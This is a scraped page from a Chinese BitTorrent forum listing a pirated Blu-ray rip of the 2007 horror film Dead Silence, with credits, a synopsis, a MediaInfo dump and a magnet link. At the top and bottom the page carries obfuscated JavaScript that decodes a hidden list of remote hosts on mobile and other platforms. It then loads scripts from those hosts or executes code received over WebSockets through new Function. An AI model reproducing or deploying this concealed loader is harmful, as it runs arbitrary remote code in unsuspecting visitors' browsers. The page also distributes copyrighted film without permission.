死寂[繁体字幕].Dead.Silence.2007.BluRay.1080p.DTS-HD.MA5.1.x265.10bit 8.03GB

版主小s 1月前 253

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 死寂 / 寂静 / 死城 / 欢迎光临死亡小镇

◎片 名 Dead Silence

◎年 代 2007

◎产 地 美国

◎类 别 悬疑 / 恐怖

◎语 言 英语

◎上映日期 2007-03-16(美国)

◎IMDb链接 https://www.imdb.com/title/tt0455760/

◎豆瓣评分 7.8/10 (223181人评价)

◎豆瓣链接 https://movie.douban.com/subject/1895120/

◎片 长 89 分钟

◎导 演 温子仁 James Wan (id:1032122)

◎编 剧 雷·沃纳尔 Leigh Whannell (id:1014029)

温子仁 James Wan (id:1032122)

◎演 员 唐尼·沃尔伯格 Donnie Wahlberg (id:1025198)

安贝·瓦莱塔 Amber Valletta (id:1006969)

瑞恩·柯万腾 Ryan Kwanten (id:1036305)

迈克尔·费尔曼 Michael Fairman (id:1032368)

鲍勃·冈顿 Bob Gunton (id:1041179)

劳拉·里根 Laura Regan (id:1312515)

斯蒂夫·亚当斯 Steve Adams (id:1050639)

凯尔·吉克瑞斯特 Keir Gilchrist (id:1027285)

奥斯汀·马乔斯 Austin Majors (id:1121877)

恩·赖特尔 Enn Reitel (id:1146498)

奥伦·科尔斯 Oren Koules (id:1005478)

格雷格·霍夫曼 Gregg Hoffman (id:1018784)

查理·克劳泽 Charlie Clouser (id:1009948)

约翰·R·莱昂耐迪 John R. Leonetti (id:1012546)

Michael N. Knue Michael N. Knue (id:1288792)

Barbara Fiorentino Barbara Fiorentino (id:1081275)

Wendy Weidman Wendy Weidman (id:1300590)

安娜斯塔西娅·马萨罗 Anastasia Masaro (id:1042128)

朱莉·贝格霍夫 Julie Berghoff (id:1425950)

克里斯蒂娜·库尼科 Christina Kuhnigk (id:1113616)

丹妮斯·柯南伯格 Denise Cronenberg (id:1281510)

Nicole Michaud Nicole Michaud (id:1205701)

Toby Sells Toby Sells (id:1143681)

兰斯·安德森 Lance Anderson (id:1277221)

Patrick Baxter Patrick Baxter (id:1208664)

Sarah Campbell Sarah Campbell (id:1276363)

Andrew Shea Andrew Shea (id:1297370)

Nick Lopez Nick Lopez (id:1209262)

Michael T. Burgess Michael T. Burgess (id:1073217)

菲奥娜·坎贝尔·韦斯特盖特 Fiona Campbell Westgate (id:1201212)

达西·里诺 Darcy Reno (id:1214643)

Brianne Wells (id:1258913)

阿龙·温特劳布 Aaron Weintraub (id:1017123)

◎标 签 恐怖 / 惊悚 / 美国 / 悬疑 / 恐怖片 / 温子仁 / 死寂 / 美国电影

◎简 介

童谣本应该充满欢声笑语,但世界上偏偏有这么一些童谣,让人听了毛骨悚然。小镇拉文斯?法尔就流传着这样一个恐怖的童谣:小心来自玛丽?肖的凝视;她没有孩子,只有玩偶;如果你看到她,不要尖叫;否则她会扯开你的嘴巴撕掉你的舌头。这个小镇一直就在笼罩在这个童谣的诅咒之下,只要有玩偶出现的地方,就有人遇害,死状一样,都是舌头被割下。

吉米(瑞恩?科万顿 Ryan Kwanten 饰)和萨丽新婚不久,就决定搬离这个受诅咒的地方,但最终萨丽还是没有逃脱这个诅咒。悲伤不已的吉米决定送妻子的尸骸返回家乡,并着手调查这个笼罩在整个小镇头上的恐怖诅咒。随着调查的深入,吉米发现了这首童谣背后的另一个真相。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 6649373191942054852239349538441984616 (0x5009F68E2B44F4ED996F9A9EC8CFA68)

  4. Complete name : [email protected]DDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 8.03 GiB

  8. Duration : 1 h 31 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 12.6 Mb/s

  11. Encoded date : UTC 2021-10-23 18:04:37

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 31 min

  21. Bit rate : 8 835 kb/s

  22. Width : 1 920 pixels

  23. Height : 800 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.240

  31. Stream size : 5.65 GiB (70%)

  32. Title : HEVC, [email protected]@High, 24/1.001 fps @ 8834 kbps

  33. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  34. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / total-frames=131640 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  35. Language : English

  36. Default : Yes

  37. Forced : No

  38. Color range : Limited

  39. Color primaries : BT.709

  40. Transfer characteristics : BT.709

  41. Matrix coefficients : BT.709


  42. Audio

  43. ID : 2

  44. Format : DTS XLL

  45. Format/Info : Digital Theater Systems

  46. Commercial name : DTS-HD Master Audio

  47. Codec ID : A_DTS

  48. Duration : 1 h 31 min

  49. Bit rate mode : Variable

  50. Bit rate : 3 690 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : C L R Ls Rs LFE

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 93.750 FPS (512 SPF)

  55. Bit depth : 24 bits

  56. Compression mode : Lossless

  57. Stream size : 2.36 GiB (29%)

  58. Title : English DTS-HD Master Audio 5.1 @ 3690 kbps

  59. Language : English

  60. Default : Yes

  61. Forced : No


  62. Text #1

  63. ID : 3

  64. Format : PGS

  65. Codec ID : S_HDMV/PGS

  66. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  67. Duration : 1 h 23 min

  68. Bit rate : 22.6 kb/s

  69. Count of elements : 1374

  70. Stream size : 13.5 MiB (0%)

  71. Title : Eng/SUP

  72. Language : English

  73. Default : No

  74. Forced : No


  75. Text #2

  76. ID : 4

  77. Format : PGS

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 31 min

  81. Bit rate : 15.7 kb/s

  82. Count of elements : 1306

  83. Stream size : 10.2 MiB (0%)

  84. Title : Cht/SUP 原盘繁体

  85. Language : Chinese

  86. Default : Yes

  87. Forced : No


  88. Menu

  89. 00:00:00.000 : en:第 01 章

  90. 00:03:34.005 : en:第 02 章

  91. 00:06:21.548 : en:第 03 章

  92. 00:12:26.204 : en:第 04 章

  93. 00:16:15.016 : en:第 05 章

  94. 00:18:53.382 : en:第 06 章

  95. 00:22:43.571 : en:第 07 章

  96. 00:28:45.933 : en:第 08 章

  97. 00:30:56.646 : en:第 09 章

  98. 00:38:09.496 : en:第 10 章

  99. 00:44:57.820 : en:第 11 章

  100. 00:48:35.037 : en:第 12 章

  101. 00:54:05.200 : en:第 13 章

  102. 00:58:21.748 : en:第 14 章

  103. 01:03:26.386 : en:第 15 章

  104. 01:08:44.704 : en:第 16 章

  105. 01:12:04.028 : en:第 17 章

  106. 01:20:09.847 : en:第 18 章

  107. 01:24:58.093 : en:第 19 章

  108. 01:27:18.233 : en:第 20 章




复制代码


TAGS 恐怖 悬疑

磁力链:
  • magnet:?xt=urn:btih:77F27554362D24731BA64DD792ED6419288440CE

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};